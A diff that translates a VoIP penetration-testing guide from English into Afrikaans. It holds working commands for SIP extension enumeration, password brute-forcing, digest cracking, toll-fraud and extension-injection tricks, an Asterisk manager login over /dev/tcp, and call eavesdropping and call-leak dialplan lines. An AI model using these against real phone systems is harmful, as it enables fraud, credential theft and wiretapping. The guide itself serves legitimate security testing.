@@ -101,85 +96,72 @@ svmap 10.10.0.0/24 -p 5060-5070 [--fp] [!] Used threads: 200 ``` - * **metasploit**: +Metasploit is 'n kragtige raamwerk vir penetrasietoetse en aanvalle. Dit bied 'n verskeidenheid van gereedskap en hulpbronne vir die uitvoer van verskeie aanvalstegnieke. Metasploit maak gebruik van 'n databasis van bekende swakpunte en maak dit moontlik om vinnig en doeltreffend te soek na en uitbuiting van swakpunte in 'n teikenstelsel. Dit is 'n waardevolle hulpmiddel vir penetrasietoetsers en aanvallers wat hul vaardighede wil verbeter en netwerke wil binnedring. ``` auxiliary/scanner/sip/options_tcp normal No SIP Endpoint Scanner (TCP) auxiliary/scanner/sip/options normal No SIP Endpoint Scanner (UDP) ``` +#### Ekstra Netwerk Enumerasie -#### Extra Network Enumeration +Die PBX kan ook ander netwerkdienste blootstel, soos: -The PBX could also be exposing other network services such as: +* **69/UDP (TFTP)**: Firmware-opdaterings +* **80 (HTTP) / 443 (HTTPS)**: Om die toestel vanaf die web te bestuur +* **389 (LDAP)**: Alternatief om die gebruikersinligting te stoor +* **3306 (MySQL)**: MySQL-databasis +* **5038 (Bestuurder)**: Maak dit moontlik om Asterisk vanaf ander platforms te gebruik +* **5222 (XMPP)**: Boodskappe met behulp van Jabber +* **5432 (PostgreSQL)**: PostgreSQL-databasis +* En ander... -* **69/UDP (TFTP)**: Firmware updates -* **80 (HTTP) / 443 (HTTPS)**: To manage the device from the web -* **389 (LDAP)**: Alternative to store the users information -* **3306 (MySQL**): MySQL database -* **5038 (Manager)**: Allows to use Asterisk from other platforms -* **5222 (XMPP)**: Messages using Jabber -* **5432 (PostgreSQL)**: PostgreSQL database -* And others... 
- -### Methods Enumeration - -It's possible to find **which methods are available** to use in the PBX using `sipenumerate.py` from [**sippts**](https://github.com/Pepelux/sippts) +### Metodes Enumerasie +Dit is moontlik om **watter metodes beskikbaar is** om in die PBX te gebruik, te vind deur `sipenumerate.py` vanaf [**sippts**](https://github.com/Pepelux/sippts) te gebruik. ```bash python3 sipenumerate.py -i 10.10.0.10 -r 5080 ``` +### Uitbreidingsoptelling -### Extension Enumeration - -Extensions in a PBX (Private Branch Exchange) system refer to the **unique internal identifiers assigned to individual** phone lines, devices, or users within an organization or business. Extensions make it possible to **route calls within the organization efficiently**, without the need for individual external phone numbers for each user or device. - -* **`svwar`** from SIPVicious (`sudo apt install sipvicious`): `svwar` is a free SIP PBX extension line scanner. In concept it works similar to traditional wardialers by **guessing a range of extensions or a given list of extensions**. +Uitbreidings in 'n PBX (Private Branch Exchange) stelsel verwys na die **unieke interne identifiseerders wat toegewys is aan individuele** telefoonlyne, toestelle of gebruikers binne 'n organisasie of besigheid. Uitbreidings maak dit moontlik om oproepe binne die organisasie doeltreffend te **roeteer**, sonder die behoefte aan individuele eksterne telefoonnommers vir elke gebruiker of toestel. +* **`svwar`** van SIPVicious (`sudo apt install sipvicious`): `svwar` is 'n gratis SIP PBX-uitbreidingslyn-skandeerder. In konsep werk dit soortgelyk aan tradisionele wardialers deur 'n reeks uitbreidings of 'n gegewe lys van uitbreidings te **raai**. ```bash svwar 10.10.0.10 -p5060 -e100-300 -m REGISTER ``` - -* **`sipextend.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** Sipexten identifies extensions on a SIP server. Sipexten can check large network and port ranges. 
- +* **`sipextend.py`** van [**sippts**](https://github.com/Pepelux/sippts)**:** Sipexten identifiseer uitbreidings op 'n SIP-bediener. Sipexten kan groot netwerk- en poortreeks ondersoek. ```bash python3 sipexten.py -i 10.10.0.10 -r 5080 -e 100-200 ``` - -* **metasploit**: You can also enumerate extensions/usernames with metasploit: - +* **metasploit**: Jy kan ook uitbreidings/gebruikersname ondersoek met metasploit: ``` auxiliary/scanner/sip/enumerator_tcp normal No SIP Username Enumerator (TCP) auxiliary/scanner/sip/enumerator normal No SIP Username Enumerator (UDP) ``` - -* **`enumiax` (`apt install enumiax`): enumIAX** is an Inter Asterisk Exchange protocol **username brute-force enumerator**. enumIAX may operate in two distinct modes; Sequential Username Guessing or Dictionary Attack. - +* **`enumiax` (`apt install enumiax`): enumIAX** is 'n Inter Asterisk Exchange-protokol **gebruikersnaam-brute-force enumerator**. enumIAX kan in twee onderskeie modusse werk; Sekwensiële Gebruikersnaam Raaiwerk of Woordelysaanval. ```bash -enumiax -d /usr/share/wordlists/metasploit/unix_users.txt 10.10.0.10 # Use dictionary +enumiax -d /usr/share/wordlists/metasploit/unix_users.txt 10.10.0.10 # Use dictionary enumiax -v -m3 -M3 10.10.0.10 ``` +## VoIP Aanvalle -## VoIP Attacks +### Wagwoord Brute-Force -### Password Brute-Force - -Having discovered the **PBX** and some **extensions/usernames**, a Red Team could try to **authenticate via the `REGISTER` method** to an extension using a dictionary of common passwords to brute force the authentication. +Nadat die **PBX** en sommige **uitbreidings/gebruikersname** ontdek is, kan 'n Rooi Span probeer om **te registreer via die `REGISTER` metode** na 'n uitbreiding deur 'n woordeboek van algemene wagwoorde te gebruik om die outentifikasie te brute force. 
{% hint style="danger" %} -Note that a **username** can be the same as the extension, but this practice may vary depending on the PBX system, its configuration, and the organization's preferences... +Let daarop dat 'n **gebruikersnaam** dieselfde as die uitbreiding kan wees, maar hierdie praktyk kan wissel afhangende van die PBX-stelsel, sy konfigurasie en die voorkeure van die organisasie... -If the username is not the same as the extension, you will need to **figure out the username to brute-force it**. +As die gebruikersnaam nie dieselfde as die uitbreiding is nie, sal jy die gebruikersnaam moet **uitvind om dit te brute force**. {% endhint %} -* **`svcrack`** from SIPVicious (`sudo apt install sipvicious`): SVCrack allows you to crack the password for a specific username/extension on a PBX. - +* **`svcrack`** van SIPVicious (`sudo apt install sipvicious`): SVCrack stel jou in staat om die wagwoord vir 'n spesifieke gebruikersnaam/uitbreiding op 'n PBX te kraak. ```bash svcrack -u100 -d dictionary.txt udp://10.0.0.1:5080 #Crack known username svcrack -u100 -r1-9999 -z4 10.0.0.1 #Check username in extensions ``` - -* **`sipcrack.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIP Digest Crack is a tool to crack the digest authentications within the SIP protocol. +* **`sipcrack.py`** van [**sippts**](https://github.com/Pepelux/sippts)**:** SIP Digest Crack is 'n instrument om die digest-verifikasies binne die SIP-protokol te kraak. {% code overflow="wrap" %} ```bash 
@@ -188,132 +170,116 @@ python3 siprcrack.py -i 10.10.0.10 -r 5080 -e 100,101,103-105 -w wordlist/rockyo {% endcode %} * **Metasploit**: - * [https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb](https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb) - * [https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack\_tcp.rb](https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack\_tcp.rb) +* [https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb](https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb) +* [https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack\_tcp.rb](https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack\_tcp.rb) ### VoIP Sniffing -If you find VoIP equipment inside an **Open Wifi network**, you could **sniff all the information**. Moreover, if you are inside a more closed network (connected via Ethernet or protected Wifi) you could perform **MitM attacks such as** [**ARPspoofing**](../../generic-methodologies-and-resources/pentesting-network/#arp-spoofing) between the **PBX and the gateway** in order to sniff the information. +As jy VoIP-toerusting binne 'n **Open Wifi-netwerk** vind, kan jy **alle inligting sniff**. Verder, as jy binne 'n meer geslote netwerk is (verbind via Ethernet of beskermde Wifi), kan jy **MitM-aanvalle uitvoer soos** [**ARPspoofing**](../../generic-methodologies-and-resources/pentesting-network/#arp-spoofing) tussen die **PBX en die gateway** om die inligting te sniff. -Among the network information, you could find **web credentials** to manage the equipment, user **extensions**, **username**, **IP** addresses, even **hashed passwords** and **RTP packets** that you could reproduce to **hear the conversation**, and more. 
+Onder die netwerkinligting kan jy **weblegitimasie** vind om die toerusting te bestuur, gebruiker **uitbreidings**, **gebruikersnaam**, **IP**-adresse, selfs **gehashte wagwoorde** en **RTP-pakette** wat jy kan reproduseer om die gesprek te **hör**, en meer. -To get this information you could use tools such as Wireshark, tcpdump... but a **specially created tool to sniff VoIP conversations is** [**ucsniff**](https://github.com/Seabreg/ucsniff). +Om hierdie inligting te kry, kan jy hulpmiddels soos Wireshark, tcpdump... gebruik, maar 'n **spesiaal geskepte hulpmiddel om VoIP-gesprekke te sniff** is [**ucsniff**](https://github.com/Seabreg/ucsniff). {% hint style="danger" %} -Note that if **TLS is used in the SIP communication** you won't be able to see the SIP communication in clear.\ -The same will happen if **SRTP** and **ZRTP** is used, **RTP packets won't be in clear text**. +Let daarop dat as **TLS in die SIP-kommunikasie gebruik word**, sal jy nie die SIP-kommunikasie in duidelike teks kan sien nie.\ +Dieselfde sal gebeur as **SRTP** en **ZRTP** gebruik word, **RTP-pakette sal nie in duidelike teks wees nie**. {% endhint %} -#### SIP credentials +#### SIP-legitimasie -[Check this example to understand better a **SIP REGISTER communication**](basic-voip-protocols/sip-session-initiation-protocol.md#sip-register-example) to learn how are **credentials being sent**. - -* **`sipdump`** & **`sipcrack`,** part of **sipcrack** (`apt-get install sipcrack`): These tools can **extract** from a **pcap** the **digest authentications** within the SIP protocol and **bruteforce** them. +[Kyk hierdie voorbeeld om 'n **SIP REGISTER-kommunikasie** beter te verstaan](basic-voip-protocols/sip-session-initiation-protocol.md#sip-register-example) om te leer hoe **legitimasie gestuur word**. 
+* **`sipdump`** & **`sipcrack`,** deel van **sipcrack** (`apt-get install sipcrack`): Hierdie hulpmiddels kan **digest-autentifikasies** binne die SIP-protokol uit 'n **pcap** **onttrek** en **bruteforce**. ```bash sipdump -p net-capture.pcap sip-creds.txt sipcrack sip-creds.txt -w dict.txt ``` - -* **`siptshar.py`, `sipdump.py`, `sipcrack.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** - * **SipTshark** extracts data of SIP protocol from a PCAP file. - * **SipDump** Extracts SIP Digest authentications from a PCAP file. - * **SIP Digest Crack** is a tool to crack the digest authentications within the SIP protocol. - +* **`siptshar.py`, `sipdump.py`, `sipcrack.py`** van [**sippts**](https://github.com/Pepelux/sippts)**:** +* **SipTshark** onttrek data van die SIP-protokol uit 'n PCAP-lêer. +* **SipDump** Onttrek SIP Digest-verifikasies uit 'n PCAP-lêer. +* **SIP Digest Crack** is 'n hulpmiddel om die digest-verifikasies binne die SIP-protokol te kraak. ```bash python3 siptshark.py -f captura3.pcap [-filter auth] python3 sipdump.py -f captura3.pcap -o data.txt python3 sipcrack.py -f data.txt -w wordlist/rockyou.txt ``` +#### DTMF-kodes -#### DTMF codes - -**Not only SIP credentials** can be found in the network traffic, it's also possible to find DTMF codes which are used for example to access the **voicemail**.\ -It's possible to send these codes in **INFO SIP messages**, in **audio** or inside **RTP packets**. If the codes are inside RTP packets, you could cut that part of the conversation and use the tool multimo to extract them: - +**Nie net SIP-legitimasie** kan in die netwerkverkeer gevind word nie, dit is ook moontlik om DTMF-kodes te vind wat byvoorbeeld gebruik word om toegang tot die **voicemail** te verkry.\ +Dit is moontlik om hierdie kodes in **INFO SIP-boodskappe**, in **klank** of binne **RTP-pakkies** te stuur. 
As die kodes binne RTP-pakkies is, kan jy daardie deel van die gesprek afsny en die multimo-hulpmiddel gebruik om hulle uit te trek: ```bash multimon -a DTMF -t wac pin.wav ``` +### Gratis Oproepe / Asterisk Verbindingsmisconfiguraties -### Free Calls / Asterisks Connections Misconfigurations - -In Asterisk it's possible to allow a connection **from an specific IP address** or from **any IP address**: - +In Asterisk is dit moontlik om 'n verbinding toe te laat **vanaf 'n spesifieke IP-adres** of vanaf **enige IP-adres**: ``` host=10.10.10.10 host=dynamic ``` +As 'n IP-adres gespesifiseer word, sal die gasheer **nie nodig hê om REGISTER-aanvrae** gereeld te stuur nie (in die REGISTER-pakket word die tyd tot lewe gestuur, gewoonlik 30 minute, wat beteken dat die foon in 'n ander scenario elke 30 minute moet REGISTER). Tog sal dit oop poorte moet hê wat verbinding vanaf die VoIP-bediener toelaat om oproepe te ontvang. -If an IP address is specified, the host **won't need to send REGISTER** requests every once in a while (in the REGISTER packet is sent the time to live, usually 30min, which means that in other scenario the phone will need to REGISTER every 30mins). However, it'll need to have open ports allowing connections from the VoIP server to take calls. +Om gebruikers te definieer, kan hulle as volg gedefinieer word: -To define users they can be defined as: +* **`type=user`**: Die gebruiker kan slegs oproepe ontvang as gebruiker. +* **`type=friend`**: Dit is moontlik om oproepe uit te voer as eweknie en om dit as gebruiker te ontvang (gebruik met uitbreidings) +* **`type=peer`**: Dit is moontlik om oproepe as eweknie te stuur en te ontvang (SIP-trunks) -* **`type=user`**: The user can only receive calls as user. 
-* **`type=friend`**: It's possible to perform calls as peer and receive them as user (used with extensions) -* **`type=peer`**: It's possible to send and receive calls as peer (SIP-trunks) +Dit is ook moontlik om vertroue te vestig met die onveilige veranderlike: -It's also possible to establish trust with the insecure variable: - -* **`insecure=port`**: Allows peer connections validated by IP. -* **`insecure=invite`**: Doesn't require authentication for INVITE messages -* **`insecure=port,invite`**: Both +* **`insecure=port`**: Laat eweknieverbindings toe wat deur IP geverifieer word. +* **`insecure=invite`**: Vereis nie outentifikasie vir INVITE-boodskappe nie +* **`insecure=port,invite`**: Beide {% hint style="warning" %} -When **`type=friend`** is used, the **value** of the **host** variable **won't be used**, so if an admin **misconfigure a SIP-trunk** using that value, **anyone will be able to connect to it**. +Wanneer **`type=friend`** gebruik word, sal die **waarde** van die **host** veranderlike **nie gebruik word nie**, so as 'n administrateur 'n SIP-trunk **verkeerd konfigureer** deur daardie waarde te gebruik, sal **enigiemand daaraan kan koppel**. -For example, this configuration would be vulnerable:\ +Byvoorbeeld, hierdie konfigurasie sou kwesbaar wees:\ `host=10.10.10.10`\ `insecure=port,invite`\ `type=friend` {% endhint %} -### Free Calls / Asterisks Context Misconfigurations +### Gratis Oproepe / Asterisk Konteks Verkeerde Konfigurasies -In Asterisk a **context** is a named container or section in the dial plan that **groups together related extensions, actions, and rules**. The dial plan is the core component of an Asterisk system, as it defines **how incoming and outgoing calls are handled and routed**. Contexts are used to organize the dial plan, manage access control, and provide separation between different parts of the system. - -Each context is defined in the configuration file, typically in the **`extensions.conf`** file. 
Contexts are denoted by square brackets, with the context name enclosed within them. For example: +In Asterisk is 'n **konteks** 'n benoemde houer of afdeling in die kiesplan wat **verwante uitbreidings, aksies en reëls groepeer**. Die kiesplan is die kernkomponent van 'n Asterisk-stelsel, aangesien dit bepaal **hoe inkomende en uitgaande oproepe hanteer en gerouteer word**. Kontekste word gebruik om die kiesplan te organiseer, toegangsbeheer te bestuur en skeiding tussen verskillende dele van die stelsel te bied. +Elke konteks word in die konfigurasie-lêer gedefinieer, tipies in die **`extensions.conf`**-lêer. Kontekste word aangedui deur vierkante hakies, met die konteksnaam daarin ingesluit. Byvoorbeeld: ```bash csharpCopy code[my_context] ``` - -Inside the context, you define extensions (patterns of dialed numbers) and associate them with a series of actions or applications. These actions determine how the call is processed. For instance: - +Binne die konteks, definieer jy uitbreidings (patrone van gekiesde nommers) en assosieer hulle met 'n reeks aksies of toepassings. Hierdie aksies bepaal hoe die oproep verwerk word. Byvoorbeeld: ```scss [my_context] exten => 100,1,Answer() exten => 100,n,Playback(welcome) exten => 100,n,Hangup() ``` +Hierdie voorbeeld demonstreer 'n eenvoudige konteks genaamd "my\_context" met 'n uitbreiding "100". Wanneer iemand 100 kies, sal die oproep beantwoord word, 'n welkom boodskap sal gespeel word, en dan sal die oproep beëindig word. -This example demonstrates a simple context called "my\_context" with an extension "100". When someone dials 100, the call will be answered, a welcome message will be played, and then the call will be terminated. 
- -This is **another context** that allows to **call to any other number**: - +Dit is **'n ander konteks** wat toelaat om **na enige ander nommer te bel**: ```scss [external] exten => _X.,1,Dial(SIP/trunk/${EXTEN}) ``` - -If the admin defines the **default context** as: - +As die admin die **verstek konteks** definieer as: ``` [default] include => my_context include => external ``` - {% hint style="warning" %} -Anyone will be able to use the **server to call to any other number** (and the admin of the server will pay for the call). +Enige persoon sal in staat wees om die **bediener te gebruik om na enige ander nommer te bel** (en die administrateur van die bediener sal vir die oproep betaal). {% endhint %} {% hint style="danger" %} -Moreover, by default the **`sip.conf`** file contains **`allowguest=true`**, then **any** attacker with **no authentication** will be able to call to any other number. +Verder bevat die **`sip.conf`** lêer standaard **`allowguest=true`**, dan sal **enige** aanvaller sonder **enige verifikasie** in staat wees om na enige ander nommer te bel. {% endhint %} -* **`sipinvite.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** Sipinvite checks if a **PBX server allows us to make calls without authentication**. If the SIP server has an incorrect configuration, it will allow us to make calls to external numbers. It can also allow us to transfer the call to a second external number. +* **`sipinvite.py`** van [**sippts**](https://github.com/Pepelux/sippts)**:** Sipinvite kyk of 'n **PBX-bedieners ons toelaat om oproepe sonder verifikasie te maak**. As die SIP-bediener 'n verkeerde konfigurasie het, sal dit ons toelaat om oproepe na eksterne nommers te maak. Dit kan ons ook toelaat om die oproep na 'n tweede eksterne nommer oor te dra. - For example, if your Asterisk server has a bad context configuration, you can accept INVITE request without authorization. In this case, an attacker can make calls without knowing any user/pass. 
+Byvoorbeeld, as jou Asterisk-bediener 'n slegte konteks-konfigurasie het, kan jy INVITE-versoeke sonder outorisasie aanvaar. In hierdie geval kan 'n aanvaller oproepe maak sonder om enige gebruikersnaam/wagwoord te weet. {% code overflow="wrap" %} ```bash 
@@ -325,22 +291,21 @@ python3 sipinvite.py -i 10.10.0.10 -tu 555555555 -t 444444444 ``` {% endcode %} -### Free calls / Misconfigured IVRS +### Gratis oproepe / Verkeerd gekonfigureerde IVRS -IVRS stands for **Interactive Voice Response System**, a telephony technology that allows users to interact with a computerized system through voice or touch-tone inputs. IVRS is used to build **automated call handling** systems that offer a range of functionalities, such as providing information, routing calls, and capturing user input. +IVRS staan vir **Interaktiewe Stem Antwoordstelsel**, 'n telefoonstegnologie wat gebruikers in staat stel om met 'n gerekenariseerde stelsel te kommunikeer deur middel van stem- of toets-tone insette. IVRS word gebruik om **outomatiese oproephantering**-stelsels te bou wat 'n verskeidenheid funksies bied, soos die voorsiening van inligting, roetes van oproepe en die vaslegging van gebruikersinsette. -IVRS in VoIP systems typically consists of: +IVRS in VoIP-stelsels bestaan tipies uit: -1. **Voice prompts**: Pre-recorded audio messages that guide users through the IVR menu options and instructions. -2. **DTMF** (Dual-Tone Multi-Frequency) signaling: Touch-tone inputs generated by pressing keys on the phone, which are used to navigate through the IVR menus and provide input. -3. **Call routing**: Directing calls to the appropriate destination, such as specific departments, agents, or extensions based on user input. -4. **User input capture**: Collecting information from callers, such as account numbers, case IDs, or any other relevant data. -5. **Integration with external systems**: Connecting the IVR system to databases or other software systems to access or update information, perform actions, or trigger events. +1. **Stemopdragte**: Vooraf opgeneemde klankboodskappe wat gebruikers deur die IVR-menu-opsies en instruksies lei. +2. 
**DTMF** (Dual-Tone Multi-Frequency) seinering: Toets-tone insette wat gegenereer word deur sleutels op die telefoon te druk, wat gebruik word om deur die IVR-menus te navigeer en insette te verskaf. +3. **Oproeproetes**: Oproepe rig na die toepaslike bestemming, soos spesifieke departemente, agente of uitbreidings gebaseer op gebruikersinsette. +4. **Gebruikersinsetvaslegging**: Inligting van oproepers versamel, soos rekeningnommers, saak-ID's of enige ander relevante data. +5. **Integrasie met eksterne stelsels**: Die IVR-stelsel verbind met databasisse of ander sagtewarestelsels om toegang tot of opdatering van inligting, uitvoering van aksies of aktivering van gebeure te verkry. -In an Asterisk VoIP system, you can create an IVR using the dial plan (**`extensions.conf`** file) and various applications such as `Background()`, `Playback()`, `Read()`, and more. These applications help you play voice prompts, capture user input, and control the call flow. - -#### Example of vulnerable configuration +In 'n Asterisk VoIP-stelsel kan jy 'n IVR skep deur die kiesplan (**`extensions.conf`**-lêer) en verskeie toepassings soos `Background()`, `Playback()`, `Read()` en meer te gebruik. Hierdie toepassings help jou om stemopdragte af te speel, gebruikersinsette vas te lê en die oproepvloei te beheer. +#### Voorbeeld van 'n kwesbare konfigurasie ```scss exten => 0,100,Read(numbers,the_call,,,,5) exten => 0,101,GotoIf("$[${numbers}"="1"]?200) 
@@ -348,48 +313,40 @@ exten => 0,102,GotoIf("$[${numbers}"="2"]?300) exten => 0,103,GotoIf("$[${numbers}"=""]?100) exten => 0,104,Dial(LOCAL/${numbers}) ``` +Die vorige is 'n voorbeeld waar die gebruiker gevra word om **1 te druk om 'n afdeling te bel**, **2 om 'n ander een te bel**, of **die volledige uitbreiding** as hy dit weet.\ +Die kwesbaarheid is die feit dat die aangeduide **uitbreidingslengte nie nagegaan word nie, sodat 'n gebruiker 'n volledige nommer kan invoer en dit sal bel.** -The previous is a example where the user is asked to **press 1 to call** a department, **2 to call** another, or **the complete extension** if he knows it.\ -The vulnerability is the fact that the indicated **extension length is not checked, so a user could input the 5seconds timeout a complete number and it will be called.** - -### Extension Injection - -Using a extension such as: +### Uitbreiding Inspruiting +Deur 'n uitbreiding soos: ```scss exten => _X.,1,Dial(SIP/${EXTEN}) ``` - -Where **`${EXTEN}`** is the **extension** that will be called, when the **ext 101 is introduced** this is what would happen: - +Waar **`${EXTEN}`** die **uitbreiding** is wat sal word opgeroep, wanneer die **ext 101 ingevoer word**, is dit wat sou gebeur: ```scss exten => 101,1,Dial(SIP/101) ``` - -However, if **`${EXTEN}`** allows to introduce **more than numbers** (like in older Asterisk versions), an attacker could introduce **`101&SIP123123123`** to call the phone number 123123123. And this would be the result: - +Echter, as **`${EXTEN}`** toelaat om **meer as net nommers** in te voer (soos in ouer Asterisk-weergawes), kan 'n aanvaller **`101&SIP123123123`** invoer om die telefoonnommer 123123123 te bel. En dit sal die resultaat wees: ```scss exten => 101&SIP123123123,1,Dial(SIP/101&SIP123123123) ``` - -Therefore, a call to the extension **`101`** and **`123123123`** will be send and only the first one getting the call would be stablished... 
but if an attacker use an **extension that bypasses any match** that is being performed but doesn't exist, he could be **inject a call only to the desired number**. +Daarom sal 'n oproep na die uitbreiding **`101`** en **`123123123`** gestuur word en slegs die eerste een wat die oproep ontvang, sal gevestig word... maar as 'n aanvaller 'n **uitbreiding gebruik wat enige ooreenstemming omseil** wat uitgevoer word maar nie bestaan nie, kan hy 'n oproep slegs na die gewenste nommer **inspuit**. ## SIPDigestLeak -The SIP Digest Leak is a vulnerability that affects a large number of SIP Phones, including both hardware and software IP Phones as well as phone adapters (VoIP to analogue). The vulnerability allows **leakage of the Digest authentication response**, which is computed from the password. An **offline password attack is then possible** and can recover most passwords based on the challenge response. +Die SIP Digest-lek is 'n kwesbaarheid wat 'n groot aantal SIP-telefone affekteer, insluitend beide hardeware- en sagteware-IP-telefone, sowel as telefoonadapters (VoIP na analoog). Die kwesbaarheid maak dit moontlik dat die Digest-verifikasierespons **uitgelek word**, wat bereken word uit die wagwoord. 'n **Aanval op die wagwoord in 'n aflyn-omgewing is dan moontlik** en kan die meeste wagwoorde herstel op grond van die uitdagingrespons. -**[Vulnerability scenario from here**](https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf): +**[Kwesbaarheidscenario vanaf hier**](https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf): -1. An IP Phone (victim) is listening on port 5060, accepting phone calls -2. The attacker sends an INVITE to the IP Phone -3. The victim phone starts ringing and someone picks up and hangs up (because no one answers the phone at the other end) -4. When the phone is hung up, the **victim phone sends a BYE to the attacker** -5. 
The **attacker issues a 407 response** that **asks for authentication** and issues an authentication challenge -6. The **victim phone provides a response to the authentication challenge** in a second BYE -7. The **attacker can then issue a brute-force attack** on the challenge response on his local machine (or distributed network etc) and guess the password - -* **sipdigestleak.py** from [**sippts**](https://github.com/Pepelux/sippts)**:** SipDigestLeak exploits this vulnerability. +1. 'n IP-telefoon (slagoffer) luister op poort 5060 en aanvaar telefoonoproepe +2. Die aanvaller stuur 'n INVITE na die IP-telefoon +3. Die slagoffer-telefoon begin lui en iemand neem op en hou op (omdat niemand die telefoon aan die ander kant antwoord nie) +4. Wanneer die telefoon neergesit word, stuur die **slagoffer-telefoon 'n BYE na die aanvaller** +5. Die **aanvaller stuur 'n 407-respons** wat **verifikasie vereis** en gee 'n verifikasie-uitdaging +6. Die **slagoffer-telefoon verskaf 'n respons op die verifikasie-uitdaging** in 'n tweede BYE +7. Die **aanvaller kan dan 'n brute-krag-aanval** op die uitdagingrespons uitvoer op sy plaaslike masjien (of verspreide netwerk ens.) en die wagwoord raai +* **sipdigestleak.py** vanaf [**sippts**](https://github.com/Pepelux/sippts)**:** SipDigestLeak maak gebruik van hierdie kwesbaarheid. ```bash python3 sipdigestleak.py -i 10.10.0.10 @@ -402,7 +359,7 @@ python3 sipdigestleak.py -i 10.10.0.10 [<=] Response 180 Ringing [<=] Response 200 OK [=>] Request ACK - ... waiting for BYE ... +... waiting for BYE ... [<=] Received BYE [=>] Request 407 Proxy Authentication Required [<=] Received BYE with digest 
@@ -410,13 +367,11 @@ python3 sipdigestleak.py -i 10.10.0.10 Auth=Digest username="pepelux", realm="asterisk", nonce="lcwnqoz0", uri="sip:100@10.10.0.10:56583;transport=UDP", response="31fece0d4ff6fd524c1d4c9482e99bb2", algorithm=MD5 ``` +### Klik2Bel -### Click2Call - -Click2Call allows a **web user** (who for example might be interested in a product) to **introduce** his **telephone number** to get called. Then a commercial will be called, and when he **picks up the phone** the user will be **called and connected with the agent**. - -A common Asterisk profile for this is: +Klik2Bel stel 'n **webgebruiker** (wat byvoorbeeld belangstel in 'n produk) in staat om sy **telefoonnommer in te voer** om gebel te word. Dan sal 'n handelaar gebel word, en wanneer hy die telefoon **opneem**, sal die gebruiker **gebels en gekoppel word met die agent**. +'n Gewone Asterisk-profiel hiervoor is: ```scss [web_user] secret = complex_password @@ -426,11 +381,10 @@ displayconnects = yes read = system,call,log,verbose,agent,user,config,dtmf,reporting,crd,diapla write = system,call,agent,user,config,command,reporting,originate ``` +* Die vorige profiel laat **ENIGE IP-adres toe om te verbind** (as die wagwoord bekend is). +* Om 'n oproep te **reël**, soos voorheen gespesifiseer, is **geen leesregte nodig** en slegs **oorsprong** in **skryf** is nodig. -* The previos profile is allowing **ANY IP address to connect** (if the password is known). -* To **organize a call**, like specified previously, **no read permissions is necessary** and **only** **originate** in **write** is needed. - -With those permissions any IP knowing the password could connect and extract too much info, like: +Met daardie regte kan enige IP-adres wat die wagwoord ken, verbind en te veel inligting onttrek, soos: {% code overflow="wrap" %} ```bash 
@@ -439,17 +393,17 @@ exec 3<>/dev/tcp/10.10.10.10/5038 && echo -e "Action: Login\nUsername:test\nSecr ``` {% endcode %} -**More information or actions could be requested.** +**Meer inligting of aksies kan versoek word.** -### **Eavesdropping** +### **Afluistering** -In Asterisk it's possible to use the command **`ChanSpy`** indicating the **extension(s) to monitor** (or all of them) to hear conversations that are happening. This command need to be assigned to an extension. +In Asterisk is dit moontlik om die opdrag **`ChanSpy`** te gebruik om die **uitbreiding(e) wat gemonitor moet word** (of almal) aan te dui om gesprekke te hoor wat plaasvind. Hierdie opdrag moet toegewys word aan 'n uitbreiding. -For example, **`exten => 333,1,ChanSpy('all',qb)`** indicate that if you **call** the **extension 333**, it will **monitor** **`all`** the extensions, **start listening** whenever a new conversation start (**`b`**) in quiet mode (**`q`**) as we don't want to interact on it. You could go from one conversation happening to another pressing **`*`**, or marking the extension number. +Byvoorbeeld, **`exten => 333,1,ChanSpy('all',qb)`** dui aan dat as jy die **uitbreiding 333** **bel**, dit sal **monitor** **`all`** die uitbreidings, **begin luister** wanneer 'n nuwe gesprek begin (**`b`**) in stilte modus (**`q`**) aangesien ons nie daarmee wil interaksie hê nie. Jy kan van die een gesprek na die ander gaan deur op **`*`** te druk, of deur die uitbreidingsnommer te merk. -It's also possible tu use **`ExtenSpy`** to monitor one extension only. +Dit is ook moontlik om **`ExtenSpy`** te gebruik om slegs een uitbreiding te monitor. -Instead of listening the conversations, it's possible to **record them in files** using an extension such as: +In plaas van om die gesprekke te beluister, is dit moontlik om hulle in lêers op te neem deur 'n uitbreiding soos die volgende te gebruik: {% code overflow="wrap" %} ```scss 
@@ -459,104 +413,92 @@ exten => _X.,2,MixMonitor(${NAME}) ``` {% endcode %} -Calls will be saved in **`/tmp`**. - -You could also even make Asterisk **execute a script that will leak the call** when it's closed. +Oproepe sal gestoor word in **`/tmp`**. +Jy kan selfs Asterisk laat **'n skripsie uitvoer wat die oproep sal uitlek** wanneer dit gesluit word. ```scss exten => h,1,System(/tmp/leak_conv.sh &) ``` - ### RTCPBleed -**RTCPBleed** is a major security issue affecting Asterisk-based VoIP servers (published in 2017). The vulnerability allows **RTP (Real Time Protocol) traffic**, which carries VoIP conversations, to be **intercepted and redirected by anyone on the Internet**. This occurs because RTP traffic bypasses authentication when navigating through NAT (Network Address Translation) firewalls. +**RTCPBleed** is 'n groot veiligheidsprobleem wat Asterisk-gebaseerde VoIP-bedieners affekteer (gepubliseer in 2017). Die kwesbaarheid maak dit moontlik vir **RTP (Real Time Protocol) verkeer**, wat VoIP-gesprekke dra, om deur enigiemand op die internet **onderskep en omgelei te word**. Dit gebeur omdat RTP-verkeer verificasie omseil wanneer dit deur NAT (Network Address Translation) vuurmuure navigeer. -RTP proxies try to address **NAT limitations** affecting RTC systems by proxying RTP streams between two or more parties. When NAT is in place, the RTP proxy software often cannot rely on the RTP IP and port information retrieved through signalling (e.g. SIP). Therefore, a number of RTP proxies have implemented a mechanism where such **IP and port tuplet is learned automatically**. This is often done by by inspecting incoming RTP traffic and marking the source IP and port for any incoming RTP traffic as the one that should be responded to. This mechanism, which may be called "learning mode", **does not make use of any sort of authentication**. 
